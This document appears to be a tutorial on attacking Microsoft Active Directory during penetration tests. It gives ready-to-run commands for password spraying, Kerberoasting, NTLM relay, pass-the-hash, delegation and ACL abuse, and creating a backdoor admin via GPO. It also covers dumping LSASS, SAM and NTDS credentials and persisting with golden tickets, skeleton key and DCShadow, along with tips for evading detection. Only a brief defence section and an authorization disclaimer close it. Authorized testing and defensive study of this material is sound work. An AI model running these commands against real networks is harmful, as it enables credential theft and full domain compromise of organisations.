Active Directory Penetration Testing: Complete Attack Methodology#

Active Directory (AD) is the backbone of enterprise network security. Understanding how to assess and exploit AD environments is crucial for penetration testers and red teamers. This comprehensive guide covers the complete attack lifecycle in AD environments.

Understanding Active Directory#

What is Active Directory?#

Active Directory is Microsoft's directory service that manages:

• User accounts and authentication
• Computer accounts and resources
• Group policies for centralized management
• Access control and permissions
• Trust relationships between domains

Why Target Active Directory?#

• Central point of control: Compromise AD = control entire network
• Credential goldmine: Contains all user credentials
• Privilege escalation: Multiple paths to Domain Admin
• Lateral movement: Easy movement between systems
• Persistence: Multiple ways to maintain access

Common AD Components#

# Domain Controller (DC)
- Authenticates users
- Manages group policies
- Stores AD database

# Domain
- Security boundary
- Logical grouping of objects

# Forest
- Collection of domains
- Shares schema and configuration

# Organizational Units (OUs)
- Containers for users/computers
- Apply group policies

# Trust Relationships
- Allow resource access between domains
- Can be one-way or two-way

Penetration Testing Methodology#

Phase 1: Initial Reconnaissance#

External Reconnaissance#

# Identify domain via DNS
nslookup -type=SRV _ldap._tcp.dc._msdcs.target.com

# Find domain controllers
nslookup -type=SRV _ldap._tcp.target.com

# Enumerate via certificate transparency
crt.sh - find subdomains

# OSINT gathering
# LinkedIn for user enumeration
# Company website for naming conventions

Network Discovery#

# Identify live hosts
nmap -sn 192.168.1.0/24

# Service discovery
nmap -sV -p- 192.168.1.0/24

# Identify Domain Controllers
nmap -p 88,389,445,636 192.168.1.0/24

# Common AD ports:
# 88: Kerberos
# 389: LDAP
# 445: SMB
# 636: LDAPS
# 3268: Global Catalog
# 3389: RDP

Phase 2: Enumeration#

Anonymous/Guest Enumeration#

# SMB Enumeration with null session
enum4linux -a 192.168.1.10

# Anonymous LDAP bind
ldapsearch -x -H ldap://192.168.1.10 -b "dc=target,dc=com"

# RPC enumeration
rpcclient -U "" -N 192.168.1.10
> enumdomusers
> enumdomgroups
> querydominfo

# SMB shares enumeration
smbclient -L //192.168.1.10 -N

# Using CrackMapExec
crackmapexec smb 192.168.1.0/24 --shares
crackmapexec smb 192.168.1.10 -u '' -p ''

Authenticated Enumeration#

Using BloodHound#

# Collect data with SharpHound
.\SharpHound.exe -c All

# From Linux with bloodhound-python
bloodhound-python -u user -p password -d target.com -dc dc01.target.com -c All

# Analyze in BloodHound GUI
# Find shortest paths to Domain Admins
# Identify ACL abuse paths
# Find Kerberoastable accounts
# Identify AS-REP Roastable users

Using PowerView#

# Import PowerView
Import-Module .\PowerView.ps1

# Get domain info
Get-Domain
Get-DomainController

# User enumeration
Get-DomainUser
Get-DomainUser -Identity admin
Get-DomainUser -SPN  # Kerberoastable users

# Computer enumeration
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server 2019*"

# Group enumeration
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins"

# Find shares
Find-DomainShare
Find-InterestingDomainShareFile

# ACL enumeration
Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDs
Find-InterestingDomainAcl

# Trust enumeration
Get-DomainTrust
Get-ForestTrust

Using ADRecon#

# Comprehensive AD enumeration
.\ADRecon.ps1 -OutputDir C:\temp\ADRecon

# Generates Excel report with:
# - Users, groups, computers
# - GPOs, OUs, trusts
# - ACLs and permissions
# - Security misconfigurations

Phase 3: Initial Access#

Credential Attacks#

Password Spraying#

# Using CrackMapExec
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123'

# Using Sprayhound
sprayhound -U users.txt -d target.com -p 'Winter2024!'

# Using Invoke-DomainPasswordSpray
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password "Password123"

# Best practices:
# - Use common passwords
# - Respect account lockout policy
# - Spray slowly to avoid detection
# - Try seasonal passwords (Summer2024!)

AS-REP Roasting#

# Find AS-REP roastable users
# Users with "Don't require Kerberos preauthentication"

# Using Rubeus
.\Rubeus.exe asreproast /format:hashcat

# Using Impacket
GetNPUsers.py target.com/ -dc-ip 192.168.1.10 -request

# Crack the hashes
hashcat -m 18200 hashes.txt wordlist.txt

# Set user as AS-REP roastable
Set-DomainObject -Identity user1 -XOR @{useraccountcontrol=4194304}

Kerberoasting#

# Request TGS for service accounts

# Using Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Using Impacket
GetUserSPNs.py target.com/user:password -dc-ip 192.168.1.10 -request

# Using PowerView
Get-DomainUser -SPN | Get-DomainSPNTicket

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt

NTLM Relay Attacks#

# Capture and relay NTLM hashes

# Setup responder
responder -I eth0 -wrf

# Setup ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support

# Force authentication
# - Link to attacker SMB share
# - Phishing with UNC paths
# - Print spooler abuse

# Mitigation check:
# SMB signing should be required
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt

Phase 4: Lateral Movement#

Pass the Hash (PtH)#

# Use NTLM hash without password

# Using CrackMapExec
crackmapexec smb 192.168.1.0/24 -u admin -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'

# Using Impacket
psexec.py -hashes ':8846f7eaee8fb117ad06bdd830b7586c' admin@192.168.1.20

# Using Evil-WinRM
evil-winrm -i 192.168.1.20 -u admin -H '8846f7eaee8fb117ad06bdd830b7586c'

Pass the Ticket (PtT)#

# Use Kerberos tickets

# Export tickets with Rubeus
.\Rubeus.exe dump

# Use ticket with Rubeus
.\Rubeus.exe ptt /ticket:base64ticket

# Linux - use ccache files
export KRB5CCNAME=/tmp/ticket.ccache
psexec.py target.com/admin@server01.target.com -k -no-pass

Overpass the Hash#

# Convert NTLM hash to Kerberos ticket

# Using Rubeus
.\Rubeus.exe asktgt /user:admin /rc4:8846f7eaee8fb117ad06bdd830b7586c /ptt

# Using Impacket
getTGT.py target.com/admin -hashes ':8846f7eaee8fb117ad06bdd830b7586c'
export KRB5CCNAME=admin.ccache

WMI and PowerShell Remoting#

# WMI execution
wmic /node:192.168.1.20 /user:admin /password:pass process call create "cmd.exe"

# PowerShell Remoting
Enter-PSSession -ComputerName SERVER01 -Credential domain\admin

# Invoke-Command
Invoke-Command -ComputerName SERVER01 -ScriptBlock {whoami}

# Using CrackMapExec
crackmapexec wmi 192.168.1.20 -u admin -p password -x "whoami"

Phase 5: Privilege Escalation#

Local Privilege Escalation#

# Check privileges
whoami /priv
whoami /groups

# Vulnerable service exploitation
# - Unquoted service paths
# - Weak service permissions
# - Always install elevated

# Using PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Using PrivescCheck
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck

# Token impersonation
# If SeImpersonatePrivilege enabled
.\PrintSpoofer.exe -i -c cmd
.\JuicyPotato.exe -l 1337 -c {...} -p cmd.exe

Domain Privilege Escalation#

DCSync Attack#

# Requires Replicating Directory Changes rights

# Using Mimikatz
lsadump::dcsync /domain:target.com /user:Administrator

# Using Impacket
secretsdump.py target.com/admin:password@192.168.1.10

# Extract all credentials from DC
secretsdump.py -just-dc target.com/admin:password@192.168.1.10

Unconstrained Delegation#

# Find computers with unconstrained delegation
Get-DomainComputer -Unconstrained

# Compromise unconstrained delegation server
# Wait for admin to authenticate
# Extract TGT with Rubeus
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x123456

# Monitor for new tickets
.\Rubeus.exe monitor /interval:5

Constrained Delegation#

# Find constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Exploit with Rubeus
.\Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.com /ptt

# Using Impacket
getST.py -spn cifs/target.com target.com/serviceaccount:password -impersonate administrator

Resource-Based Constrained Delegation (RBCD)#

# Requires write access to msDS-AllowedToActOnBehalfOfOtherIdentity

# Create new computer account
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount attackerpc -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)

# Set RBCD
$ComputerSid = Get-DomainComputer attackerpc -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer target-server | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# Exploit
.\Rubeus.exe s4u /user:attackerpc$ /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target-server.target.com /ptt

GPO Abuse#

# Find GPOs where you have write access
Get-DomainGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "Write"}

# Add user to local admin via GPO
# Using SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Default Domain Policy"

# Using PowerView
New-GPOImmediateTask -TaskName Update -GPODisplayName "Vulnerable GPO" -CommandArguments "-c 'net user backdoor Password123! /add && net localgroup administrators backdoor /add'"

ACL Abuse#

# Find ACL abuse paths with BloodHound

# GenericAll on user
# Reset password
Set-DomainUserPassword -Identity target-user -AccountPassword (ConvertTo-SecureString 'NewPassword!' -AsPlainText -Force)

# WriteDACL on object
# Grant yourself GenericAll
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity attacker -Rights All

# GenericWrite on computer
# Set RBCD (see above)

# ForceChangePassword
$NewPassword = ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force
Set-DomainUserPassword -Identity target-user -AccountPassword $NewPassword

Phase 6: Credential Dumping#

LSASS Dumping#

# Using Mimikatz
sekurlsa::logonpasswords

# Using Procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Using Task Manager
# Right-click lsass.exe -> Create dump file

# Parse offline with Mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

# Using pypykatz (Linux)
pypykatz lsa minidump lsass.dmp

SAM/SYSTEM Dumping#

# Dump SAM database
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

# Extract with Impacket
secretsdump.py -sam sam.save -system system.save LOCAL

# Using CrackMapExec
crackmapexec smb 192.168.1.20 -u admin -p password --sam

NTDS.dit Extraction#

# Method 1: VSS Shadow Copy
# On DC with DA privileges
ntdsutil "ac i ntds" "ifm" "create full C:\temp\ntds" q q

# Method 2: Using secretsdump
secretsdump.py target.com/admin:password@192.168.1.10 -just-dc

# Method 3: Using CrackMapExec
crackmapexec smb 192.168.1.10 -u admin -p password --ntds

# Extract hashes
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Phase 7: Persistence#

Golden Ticket#

# Requires krbtgt hash

# Create golden ticket with Mimikatz
kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt

# Using Impacket
ticketer.py -nthash krbtgt_hash -domain-sid S-1-5-21-... -domain target.com Administrator
export KRB5CCNAME=Administrator.ccache

Silver Ticket#

# Requires service account hash

# Create silver ticket
kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /target:server.target.com /service:cifs /rc4:service_hash /ptt

# Using Impacket
ticketer.py -nthash service_hash -domain-sid S-1-5-21-... -domain target.com -spn cifs/server.target.com Administrator

Skeleton Key#

# Inject skeleton key into DC
# Allows authentication with master password

# Using Mimikatz on DC
misc::skeleton

# Now authenticate with any user:
# Password: mimikatz

AdminSDHolder#

# Add user to AdminSDHolder
# User will become protected principal

Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=target,DC=com" -PrincipalIdentity attacker -Rights All

DCShadow#

# Create rogue DC to make changes
# Requires DA privileges

# Using Mimikatz
lsadump::dcshadow /object:targetuser /attribute:sidHistory /value:S-1-5-21-...-500
lsadump::dcshadow /push

Detection and Defense#

Monitoring and Detection#

# Monitor for:
- Multiple failed logins (password spraying)
- Unusual Kerberos activity
- DCSync operations
- NTLM relay attempts
- Suspicious PowerShell usage
- Privilege escalation attempts
- Lateral movement patterns

# Tools:
- Windows Event Logs
- Sysmon
- Microsoft Defender for Identity
- Splunk/ELK
- Sigma rules

Hardening Recommendations#

# 1. Tiered Administration Model
# Separate admin accounts for different tiers

# 2. LAPS (Local Administrator Password Solution)
# Randomize local admin passwords

# 3. Protected Users Group
# Add privileged users to Protected Users group

# 4. Disable NTLM
# Force Kerberos-only authentication

# 5. SMB Signing
# Require SMB signing on all devices

# 6. Credential Guard
# Protect credentials with virtualization

# 7. Remove excessive permissions
# Apply least privilege principle

# 8. Monitor and audit
# Enable detailed auditing
# Monitor for anomalies

# 9. Patch management
# Keep systems updated

# 10. Network segmentation
# Limit lateral movement

Essential Tools Summary#

Windows Tools#

# Reconnaissance/Enumeration
- BloodHound/SharpHound
- PowerView
- ADRecon
- ADExplorer

# Exploitation
- Rubeus
- Mimikatz
- Impacket suite
- CrackMapExec

# Post-Exploitation
- PowerUp
- PowerSploit
- SharpGPOAbuse

Linux Tools#

# Enumeration
- enum4linux
- ldapsearch
- bloodhound-python

# Exploitation
- Impacket (GetUserSPNs, GetNPUsers, etc.)
- CrackMapExec
- Responder

# Credential attacks
- hashcat
- john

Practical Attack Chain Example#

# 1. Initial enumeration
crackmapexec smb 192.168.1.0/24

# 2. Identify AS-REP roastable users
GetNPUsers.py target.com/ -dc-ip 192.168.1.10 -request

# 3. Crack hash
hashcat -m 18200 hash.txt wordlist.txt

# 4. Authenticate with credentials
crackmapexec smb 192.168.1.10 -u user1 -p 'CrackedPassword123'

# 5. Run BloodHound collection
bloodhound-python -u user1 -p 'CrackedPassword123' -d target.com -dc dc01.target.com -c All

# 6. Identify path to Domain Admin in BloodHound

# 7. Exploit path (e.g., GenericAll on another user)
# Reset user password via LDAP

# 8. Kerberoast with new access
GetUserSPNs.py target.com/user2:password -dc-ip 192.168.1.10 -request

# 9. Crack service account
hashcat -m 13100 service_hash.txt wordlist.txt

# 10. If service account has DA rights, dump credentials
secretsdump.py target.com/serviceaccount:password@192.168.1.10 -just-dc

# 11. Create golden ticket for persistence
# Use krbtgt hash obtained from DCSync

Conclusion#

Active Directory penetration testing requires a systematic approach and deep understanding of Windows security mechanisms. Key takeaways:

1. Enumerate thoroughly - BloodHound is your best friend
2. Follow the kill chain - Initial access → Lateral movement → Privilege escalation
3. Abuse trust - AD is built on trust, exploit it
4. Be patient - AD compromise takes time
5. Stay stealthy - Use living-off-the-land techniques
6. Document everything - Clear evidence for clients

Remember: Always operate within legal boundaries and only test systems you have explicit authorization to test.

---

Stay updated on the latest AD attack techniques and defenses. Follow for more advanced penetration testing methodologies.